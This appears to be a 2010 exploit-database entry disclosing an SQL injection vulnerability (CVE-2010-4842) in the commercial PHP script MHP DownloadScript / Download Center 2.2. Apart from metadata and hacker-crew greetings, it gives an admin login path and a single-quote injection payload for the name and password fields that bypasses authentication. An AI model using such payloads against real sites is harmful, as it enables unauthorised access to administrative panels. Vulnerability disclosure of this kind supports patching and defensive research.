Download Center 2.2 - SQL Injection

Author: DeadLy DeMon
type: webapps
platform: php
port: 
date_added: 2010-12-18 
date_updated: 2010-12-18 
verified: 1 
codes: OSVDB-69949;CVE-2010-4842 
tags: 
aliases:  
screenshot_url:  
application_url: 

Name : MHP DownloadScript v2.2 <<= SQL injection Vulnerability

+Autor : DeadLy DeMon
+Date : 18.12.2010
+Script : MHP DownloadScript v2.2
+Download : ----
+Site : http://www.mhproducts.de/php-scripte-5/tools-dienste/download-center.html
+Dork : Not Dork
+Price : 4,99 EURO
+Language : PHP
+Tests : Windows XP SP 3 and Backtrack4 any other OS
+Discovered by DeadLy DeMon
+ Cyber - Warrir TIM =>> www.Cyber-warrior.org
+Greetz to All KinqSqlZ Crew

---------------------------------------------------------------------------------------
DeadLy DeMon ,System-Hacker , BlackApple , HeroTurk , F0RTYS3V3N ,
JackTheRipper , Sadrazam and All KinqSqlZCrew Member

Aklınıza Geliriz , Aklınız
Gider..                                               KinqSqlZ Crew Akar...

----------------------------------------------------------------------------------------
Bug ;

*target/path/downloadcenter/admin/
*
*name : '

pass : '*